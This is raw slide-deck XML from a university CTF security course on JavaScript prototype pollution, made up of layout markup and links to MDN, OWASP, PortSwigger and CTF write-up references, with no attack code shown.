              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>RCE / prev esca .. etc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ff5549f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ff5549f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86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685524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055495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706632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036212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373402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043169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4122572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806327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894238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ff5549f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ff5549f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80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27764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125353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89004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ff5549f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ff5549f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048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821135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43afeaea7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43afeaea7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135169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948805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711675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623133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8635ce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78635ce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410677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261067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835530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4104339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09255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406198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937480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599833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7866287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54529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e639a470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e639a470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853954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7ff5549f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7ff5549f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874831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966221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490999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4218527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7" name="Google Shape;17;p2"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6832275" y="4257325"/>
            <a:ext cx="2156400" cy="736041"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Google Shape;18;p2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="727950" y="640070"/>
            <a:ext cx="7688100" cy="541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solidFill>
                  <a:srgbClr val="1A1A1A"/>
                </a:solidFill>
                <a:latin typeface="Raleway"/>
                <a:ea typeface="Raleway"/>
                <a:cs typeface="Raleway"/>
                <a:sym typeface="Raleway"/>
              </a:rPr>
              <a:t>COMP3633  Competitive Programming in Cybersecurity II</a:t>
            </a:r>
            <a:endParaRPr sz="1900" b="1">
              <a:solidFill>
                <a:srgbClr val="1A1A1A"/>
              </a:solidFill>
              <a:latin typeface="Raleway"/>
              <a:ea typeface="Raleway"/>
              <a:cs typeface="Raleway"/>
              <a:sym typeface="Raleway"/>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830392" y="1191256"/>
            <a:ext cx="745763" cy="45826"/>
            <a:chOff x="4580561" y="2589004"/>
            <a:chExt cx="1064464" cy="25200"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="21" name="Google Shape;21;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4" name="Google Shape;24;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25" name="Google Shape;25;p3"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6833263" y="4257675"/>
            <a:ext cx="2154427" cy="73535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830392" y="1191256"/>
            <a:ext cx="745763" cy="45826"/>
            <a:chOff x="4580561" y="2589004"/>
            <a:chExt cx="1064464" cy="25200"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="36" name="Google Shape;36;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729450" y="571925"/>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9" name="Google Shape;39;p5"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="729450" y="1321199"/>
            <a:ext cx="7688700" cy="3428651"/>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0" name="Google Shape;40;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5"/>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
        <p:nvSpPr>
          <p:cNvPr id="42" name="Google Shape;42;p5"/>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latin typeface="Raleway"/>
                <a:ea typeface="Raleway"/>
                <a:cs typeface="Raleway"/>
                <a:sym typeface="Raleway"/>
              </a:rPr>
              <a:t>Firebird CTF Team</a:t>
            </a:r>
            <a:endParaRPr sz="800" b="1">
              <a:solidFill>
                <a:srgbClr val="666666"/>
              </a:solidFill>
              <a:latin typeface="Raleway"/>
              <a:ea typeface="Raleway"/>
              <a:cs typeface="Raleway"/>
              <a:sym typeface="Raleway"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="43" name="Google Shape;43;p5"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="160801" y="116840"/>
            <a:ext cx="254126" cy="25412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4"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="45" name="Google Shape;45;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830392" y="1191256"/>
            <a:ext cx="745763" cy="45826"/>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6"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="729450" y="571925"/>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6"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="729325" y="1441199"/>
            <a:ext cx="3774300" cy="3308651"/>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6"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4643604" y="1441199"/>
            <a:ext cx="3774300" cy="3308651"/>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2" name="Google Shape;52;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6"/>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
        <p:nvSpPr>
          <p:cNvPr id="54" name="Google Shape;54;p6"/>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latin typeface="Raleway"/>
                <a:ea typeface="Raleway"/>
                <a:cs typeface="Raleway"/>
                <a:sym typeface="Raleway"/>
              </a:rPr>
              <a:t>Firebird CTF Team</a:t>
            </a:r>
            <a:endParaRPr sz="800" b="1">
              <a:solidFill>
                <a:srgbClr val="666666"/>
              </a:solidFill>
              <a:latin typeface="Raleway"/>
              <a:ea typeface="Raleway"/>
              <a:cs typeface="Raleway"/>
              <a:sym typeface="Raleway"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="55" name="Google Shape;55;p6"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="160801" y="116840"/>
            <a:ext cx="254126" cy="2541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sp>
        <p:nvSpPr>
          <p:cNvPr id="57" name="Google Shape;5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7"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="830392" y="1191256"/>
            <a:ext cx="745763" cy="45826"/>
            <a:chOff x="4580561" y="2589004"/>
            <a:chExt cx="1064464" cy="25200"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="59" name="Google Shape;5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2" name="Google Shape;6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3" name="Google Shape;63;p7"/>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
        <p:nvSpPr>
          <p:cNvPr id="64" name="Google Shape;64;p7"/>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latin typeface="Raleway"/>
                <a:ea typeface="Raleway"/>
                <a:cs typeface="Raleway"/>
                <a:sym typeface="Raleway"/>
              </a:rPr>
              <a:t>Firebird CTF Team</a:t>
            </a:r>
            <a:endParaRPr sz="800" b="1">
              <a:solidFill>
                <a:srgbClr val="666666"/>
              </a:solidFill>
              <a:latin typeface="Raleway"/>
              <a:ea typeface="Raleway"/>
              <a:cs typeface="Raleway"/>
              <a:sym typeface="Raleway"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="65" name="Google Shape;65;p7"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="160801" y="116840"/>
            <a:ext cx="254126" cy="2541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6"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="67" name="Google Shape;67;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8"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="830392" y="1191256"/>
            <a:ext cx="745763" cy="45826"/>
            <a:chOff x="4580561" y="2589004"/>
            <a:chExt cx="1064464" cy="25200"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="69" name="Google Shape;69;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8"/>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2" name="Google Shape;72;p8"/>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dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="73" name="Google Shape;73;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8"/>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
        <p:nvSpPr>
          <p:cNvPr id="75" name="Google Shape;75;p8"/>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latin typeface="Raleway"/>
                <a:ea typeface="Raleway"/>
                <a:cs typeface="Raleway"/>
                <a:sym typeface="Raleway"/>
              </a:rPr>
              <a:t>Firebird CTF Team</a:t>
            </a:r>
            <a:endParaRPr sz="800" b="1">
              <a:solidFill>
                <a:srgbClr val="666666"/>
              </a:solidFill>
              <a:latin typeface="Raleway"/>
              <a:ea typeface="Raleway"/>
              <a:cs typeface="Raleway"/>
              <a:sym typeface="Raleway"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="76" name="Google Shape;76;p8"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="160801" y="116840"/>
            <a:ext cx="254126" cy="2541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1"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="92" name="Google Shape;92;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11"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="830392" y="1191256"/>
            <a:ext cx="745763" cy="45826"/>
            <a:chOff x="4580561" y="2589004"/>
            <a:chExt cx="1064464" cy="25200"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="94" name="Google Shape;94;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7" name="Google Shape;97;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8" name="Google Shape;98;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9" name="Google Shape;9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00" name="Google Shape;100;p11"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="379600" y="125612"/>
            <a:ext cx="1682400" cy="25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dirty="0">
                <a:solidFill>
                  <a:srgbClr val="666666"/>
                </a:solidFill>
                <a:latin typeface="Raleway"/>
                <a:ea typeface="Raleway"/>
                <a:cs typeface="Raleway"/>
                <a:sym typeface="Raleway"/>
              </a:rPr>
              <a:t>Firebird CTF Team</a:t>
            </a:r>
            <a:endParaRPr sz="800" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="666666"/>
              </a:solidFill>
              <a:latin typeface="Raleway"/>
              <a:ea typeface="Raleway"/>
              <a:cs typeface="Raleway"/>
              <a:sym typeface="Raleway"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="101" name="Google Shape;101;p11"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="160801" y="116840"/>
            <a:ext cx="254126" cy="254126"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="102" name="Google Shape;102;p11"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6074700" y="0"/>
            <a:ext cx="3069300" cy="48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b="1">
                <a:solidFill>
                  <a:srgbClr val="666666"/>
                </a:solidFill>
                <a:latin typeface="Raleway"/>
                <a:ea typeface="Raleway"/>
                <a:cs typeface="Raleway"/>
                <a:sym typeface="Raleway"/>
              </a:rPr>
              <a:t>COMP3633  Competitive Programming in Cybersecurity II</a:t>
            </a:r>
            <a:endParaRPr sz="800" b="1">
              <a:solidFill>
                <a:srgbClr val="666666"/>
              </a:solidFill>
              <a:latin typeface="Raleway"/>
              <a:ea typeface="Raleway"/>
              <a:cs typeface="Raleway"/>
              <a:sym typeface="Ralewa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Only">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 103"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="104" name="Google Shape;104;p12"/>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5" name="Google Shape;105;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07"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="108" name="Google Shape;108;p13"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="830392" y="4169130"/>
            <a:ext cx="745763" cy="45826"/>
            <a:chOff x="4580561" y="2589004"/>
            <a:chExt cx="1064464" cy="25200"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="109" name="Google Shape;109;p1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3"/>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12" name="Google Shape;112;p13"/>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13" name="Google Shape;113;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114" name="Google Shape;114;p13"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6833263" y="4257675"/>
            <a:ext cx="2154427" cy="7353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7" r:id="rId7"/>
    <p:sldLayoutId id="2147483658" r:id="rId8"/>
    <p:sldLayoutId id="2147483659"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hyperlink" Target="https://ctftime.org/writeup/36991" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cheatsheetseries.owasp.org/cheatsheets/Prototype_Pollution_Prevention_Cheat_Sheet.html#if-objects-or-object-literals-are-required" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://ctftime.org/writeup/28035" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://blog.huli.tw/2023/06/22/ejs-render-vulnerability-ctf/" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout3.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cheatsheetseries.owasp.org/cheatsheets/Prototype_Pollution_Prevention_Cheat_Sheet.html#use-object-freeze-and-seal-mechanisms" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://ctftime.org/writeups?hidden-tags=prototype-pollution" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cheatsheetseries.owasp.org/cheatsheets/Prototype_Pollution_Prevention_Cheat_Sheet.html#use-new-set-or-new-map" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://ctftime.org/writeup/39045" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://cheatsheetseries.owasp.org/cheatsheets/Prototype_Pollution_Prevention_Cheat_Sheet.html#nodejs-configuration-flag" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://ctftime.org/writeup/38612" TargetMode="External"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide101.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://developer.mozilla.org/docs/Web/JavaScript/Reference/Global_Objects/Boolean#boolean_coercion" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://developer.mozilla.org/docs/Web/JavaScript/Data_structure" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://developer.mozilla.org/docs/Web/JavaScript/Reference/Functions/set" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://curl.se/docs/manpage.html" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout3.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://developer.mozilla.org/docs/Web/JavaScript/Reference/Functions/get" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://developer.mozilla.org/docs/Web/JavaScript/Reference/Global_Objects/Object#instance_methods" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://developer.mozilla.org/docs/Web/JavaScript/Inheritance_and_the_prototype_chain#implicit_constructors_of_literals" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://developer.mozilla.org/docs/Web/JavaScript/Reference/Global_Objects/Object#description" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://developer.mozilla.org/docs/Web/JavaScript/Inheritance_and_the_prototype_chain" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://developer.mozilla.org/docs/Web/JavaScript/Reference/Global_Objects/Map" TargetMode="External"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide102.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://developer.mozilla.org/docs/Web/JavaScript/Reference/Global_Objects/Object/proto#browser_compatibility" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://developer.mozilla.org/docs/Web/JavaScript/Reference/Global_Objects/Object/assign" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://developer.mozilla.org/docs/Web/JavaScript/Reference/Global_Objects/Object/proto" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://developer.mozilla.org/docs/Web/JavaScript/Reference/Global_Objects/Object#null-prototype_objects" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout3.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://developer.mozilla.org/docs/Web/JavaScript/Reference/Global_Objects/Object/getPrototypeOf" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://developer.mozilla.org/docs/Web/JavaScript/Reference/Global_Objects/Object/toString" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://developer.mozilla.org/docs/Web/JavaScript/Reference/Global_Objects/Object/freeze" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://developer.mozilla.org/docs/Web/JavaScript/Reference/Global_Objects/Object/setPrototypeOf" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://developer.mozilla.org/docs/Web/JavaScript/Reference/Global_Objects/Object/constructor" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://developer.mozilla.org/docs/Web/JavaScript/Reference/Global_Objects/Object/seal" TargetMode="External"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide103.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://docs.python.org/3/library/stdtypes.html#instance.__class__" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://developer.mozilla.org/docs/Web/JavaScript/Reference/Operators/Property_accessors#bracket_notation" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://developer.mozilla.org/docs/Web/JavaScript/Reference/Operators/typeof#typeof_null" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://developer.mozilla.org/docs/Web/JavaScript/Reference/Global_Objects/Set" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout3.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://developer.mozilla.org/docs/Web/JavaScript/Reference/Operators/typeof" TargetMode="External"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/hughsk/flat/issues/105" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://developer.mozilla.org/docs/Web/JavaScript/Reference/Operators/Spread_syntax#comparing_with_object.assign" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/advisories/GHSA-2j2x-2gpw-g8fm" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://developer.mozilla.org/docs/Web/JavaScript/Reference/Operators/Property_accessors#dot_notation" TargetMode="External"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://gist.github.com/matthiasak/c3c9c40d0f98ca91def1" TargetMode="External"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide104.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://web.archive.org/web/20201109113214/https:/blog.p6.is/AST-Injection/" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nodejs.org/en/download" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://tc39.es/ecma262/#sec-ordinary-object-internal-methods-and-internal-slots" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/ljharb/qs#readme" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout3.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://pugjs.org/language/code.html" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://portswigger.net/web-security/prototype-pollution/preventing#sanitizing-property-keys" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://portswigger.net/web-security/prototype-pollution#how-do-prototype-pollution-vulnerabilities-arise"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hyperlink" Target="https://developer.mozilla.org/docs/Web/JavaScript/Reference/Operators/Property_accessors#bracket_notation" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://developer.mozilla.org/docs/Web/JavaScript/Reference/Operators/Property_accessors#dot_notat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docs/Web/JavaScript/Reference/Operators/Property_accessors#dot_notation"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ozilla.org/docs/Web/JavaScript/Reference/Functions/ge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developer.mozilla.org/docs/Web/JavaScript/Reference/Functions/se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eveloper.mozilla.org/docs/Web/JavaScript/Inheritance_and_the_prototype_chain" TargetMode="Externa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tc39.es/ecma262/#sec-ordinary-object-internal-methods-and-internal-slots" TargetMode="External"/><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getPrototypeO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developer.mozilla.org/docs/Web/JavaScript/Reference/Global_Objects/Object/setPrototypeO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description"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null-prototype_object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instance_method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developer.mozilla.org/docs/Web/JavaScript/Reference/Global_Objects/Object/toString"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hyperlink" Target="https://nodejs.org/en/download"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proto"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proto"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prot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4.gif"/></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tftime.org/writeup/39045"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gif"/></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hyperlink" Target="https://ctftime.org/writeup/38994"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localhost/" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://example.com/?key=value&amp;key2=value2" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout3.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://curl.se/docs/manpage.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ljharb/qs#readme"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ljharb/qs#readme"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hyperlink" Target="https://developer.mozilla.org/docs/Web/JavaScript/Reference/Global_Objects/Object/constructor"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constructor" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://developer.mozilla.org/docs/Web/JavaScript/Inheritance_and_the_prototype_chain#implicit_constructors_of_literals"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ctftime.org/writeup/39045"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portswigger.net/web-security/prototype-pollution#how-do-prototype-pollution-vulnerabilities-arise"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hyperlink" Target="https://developer.mozilla.org/docs/Web/JavaScript/Reference/Operators/Spread_syntax#comparing_with_object.assign" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://developer.mozilla.org/docs/Web/JavaScript/Reference/Global_Objects/Object/assign"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tftime.org/writeup/38612"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Boolean#boolean_coercion"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advisories/GHSA-2j2x-2gpw-g8fm" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image51.png"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://ctftime.org/writeup/28035" TargetMode="Externa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hyperlink" 